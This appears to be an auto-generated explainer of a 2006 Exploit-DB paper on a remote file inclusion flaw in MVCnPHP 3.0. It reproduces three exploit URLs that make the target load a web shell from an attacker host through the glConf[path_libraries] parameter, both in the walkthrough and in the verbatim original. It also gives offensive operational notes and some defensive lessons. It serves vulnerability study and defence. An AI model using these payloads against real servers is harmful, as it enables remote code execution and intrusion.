By exploitdb papers bot•August 10, 2006•
papers
MVCnPHP 3.0 Remote File Inclusion Explained
MVCnPHP 3.0 Remote File Inclusion Explained
What this paper is
This paper details a Remote File Inclusion (RFI) vulnerability in MVCnPHP version 3.0.0. RFI allows an attacker to trick a web application into including and executing code from a remote server, effectively allowing arbitrary code execution on the target.
Simple technical breakdown
The vulnerability lies in how the MVCnPHP application handles configuration settings, specifically the glConf[path_libraries] parameter. When this parameter is controlled by user input and not properly sanitized, an attacker can point it to a malicious PHP file hosted on their own server. The application then fetches and executes this remote file as if it were a local library, leading to code execution.
Complete code and payload walkthrough
The provided exploit paper does not contain any source code for the MVCnPHP application itself, nor does it provide specific shellcode or payload bytes. It only lists the affected files and the exploit syntax.
Affected Files:
BaseCommand.phpBaseLoader.phpBaseView.php
Exploit Syntax:
http://server/dir_mvcnphp/BaseCommand.php?glConf[path_libraries]=http://evalsite.com/shell.phphttp://server/dir_mvcnphp/BaseLoader.php?glConf[path_libraries]=http://evalsite.com/shell.phphttp://server/dir_mvcnphp/BaseView.php?glConf[path_libraries]=http://evalsite.com/shell.php
Explanation of the Exploit Syntax:
http://server/dir_mvcnphp/: This is the base URL of the vulnerable MVCnPHP application on the target server.BaseCommand.php,BaseLoader.php,BaseView.php: These are the specific PHP files within the MVCnPHP application that are vulnerable.?: This signifies the start of the query string parameters.glConf[path_libraries]=: This is the vulnerable parameter. The application likely uses this parameter to configure the path where it looks for libraries.http://evalsite.com/shell.php: This is the attacker-controlled URL pointing to a malicious PHP file (e.g., a web shell) hosted on the attacker's server (evalsite.com).
Mapping:
glConf[path_libraries]parameter -> Practical Purpose: User-controlled input that dictates where the application loads its libraries from.http://evalsite.com/shell.php-> Practical Purpose: The remote file containing malicious code (e.g., a web shell) that the attacker wants to execute on the target server.
Unknowns:
- The exact code within
BaseCommand.php,BaseLoader.php, andBaseView.phpthat leads to the RFI is not provided. - The content of
shell.phpis not provided, but it is assumed to be a standard PHP web shell for arbitrary command execution.
Practical details for offensive operations teams
- Required Access Level: Unauthenticated access to the web application. The vulnerability is exposed via GET parameters in the URL.
- Lab Preconditions:
- A target web server running MVCnPHP version 3.0.0.
- A separate attacker-controlled server (e.g., a VPS or a local web server) capable of serving PHP files. This server will host the malicious
shell.php. - The attacker's server must be accessible from the target server over HTTP/HTTPS.
- Tooling Assumptions:
- A web browser for crafting and sending requests.
- A web server (e.g., Apache, Nginx) on the attacker's machine to host the payload.
- A text editor to create the
shell.phpfile. - Tools like
curlor Burp Suite can be used for more advanced testing and automation.
- Execution Pitfalls:
- Firewall/Network Restrictions: The target server might have outbound firewall rules preventing it from connecting to the attacker's server.
- Input Validation/Sanitization: Later versions of MVCnPHP or other security measures (like WAFs) might have patched this vulnerability or implemented checks that prevent the RFI.
- PHP Configuration (
allow_url_fopen): The target server's PHP configuration must haveallow_url_fopenenabled for RFI to work. If this is disabled, the vulnerability becomes Local File Inclusion (LFI) if file paths can be controlled. - Payload Hosting: The attacker's server must be stable and accessible.
- File Extension: The target application might be configured to only include files with specific extensions (e.g.,
.php). If the attacker's payload is not a.phpfile, it might not be executed.
- Telemetry:
- Network Logs: Outbound HTTP/HTTPS requests from the target server to the attacker's server.
- Web Server Logs (Target): Access logs showing requests to
BaseCommand.php,BaseLoader.php, orBaseView.phpwith theglConf[path_libraries]parameter. Error logs might indicate issues with fetching remote files. - Web Server Logs (Attacker): Access logs showing requests from the target server for
shell.php. - Application Logs (Target): If the application logs include details about loaded libraries or configuration, these might show the remote path being used.
- Process Execution (Target): If the
shell.phpexecutes commands, evidence of new processes being spawned by the web server user.
Where this was used and when
- Context: This vulnerability was found in the MVCnPHP web application framework.
- Approximate Year/Date: Published on 2006-08-10. This indicates the vulnerability was likely present and exploitable around that time. Such vulnerabilities in older, unpatched web applications can persist for years.
Defensive lessons for modern teams
- Input Validation is Crucial: Always validate and sanitize user-supplied input, especially when it's used in file paths, configuration settings, or database queries.
- Disable
allow_url_fopenandallow_url_include: For most web applications, these PHP directives should be disabled inphp.inito prevent RFI vulnerabilities. If remote file inclusion is absolutely necessary, it should be implemented with extreme caution and strict controls. - Use Whitelisting: Instead of blacklisting potentially harmful characters or patterns, maintain a whitelist of allowed values for configuration parameters like library paths.
- Regular Patching and Updates: Keep all web application frameworks and their dependencies updated to the latest secure versions.
- Web Application Firewalls (WAFs): Deploy and configure WAFs to detect and block common attack patterns, including RFI attempts.
- Secure Configuration: Review and harden server and application configurations to minimize attack surfaces.
ASCII visual (if applicable)
+-----------------+ +--------------------+ +--------------------+
| Attacker Server |----->| Target Web Server |----->| MVCnPHP Application|
| (e.g., evalSite) | | (e.g., server) | | (e.g., MVCnPHP 3.0)|
| +-------------+ | | +----------------+ | | +----------------+ |
| | shell.php | | | | Apache/Nginx | | | | BaseCommand.php| |
| +-------------+ | | +----------------+ | | | BaseLoader.php | |
+-----------------+ +--------------------+ | | BaseView.php | |
+----------------+ |
^ |
| |
+-------------+
(Exploit URL:
http://server/dir_mvcnphp/BaseCommand.php?glConf[path_libraries]=http://evalsite.com/shell.php)Explanation of Diagram:
- The Attacker Server hosts the malicious
shell.phpfile. - The Target Web Server receives the exploit request.
- The MVCnPHP Application running on the target server processes the request.
- The application, due to the vulnerability, makes an outbound HTTP request to the Attacker Server to fetch
shell.php. - The fetched
shell.phpis then executed by the PHP interpreter on the Target Web Server, leading to code execution.
Source references
- Paper ID: 2173
- Paper Title: MVCnPHP 3.0 - glConf[path_libraries] Remote File Inclusion
- Author: Drago84
- Published: 2006-08-10
- Keywords: PHP, webapps
- Paper URL: https://www.exploit-db.com/papers/2173
- Raw URL: https://www.exploit-db.com/raw/2173
Original Exploit-DB Content (Verbatim)
MVCnPHP Remote File Inclusion
############ToXiC CrEw###############
Bug Found by Drago84
Page Sources:
http://freshmeat.net/redir/mvcnphp/46123/url_tgz/Geeklog_MVCnPHP-3.0.0.tgz
Page Affect:
BaseCommand.php
BaseLoader.php
BaseView.php
ExP:
http://server/dir_mvcnphp/BaseCommand.php?glConf[path_libraries]=http://evalsite.com/shell.php
http://server/dir_mvcnphp/BaseLoader.php?glConf[path_libraries]=http://evalsite.com/shell.php
http://server/dir_mvcnphp/BaseView.php?glConf[path_libraries]=http://evalsite.com/shell.php
# milw0rm.com [2006-08-10]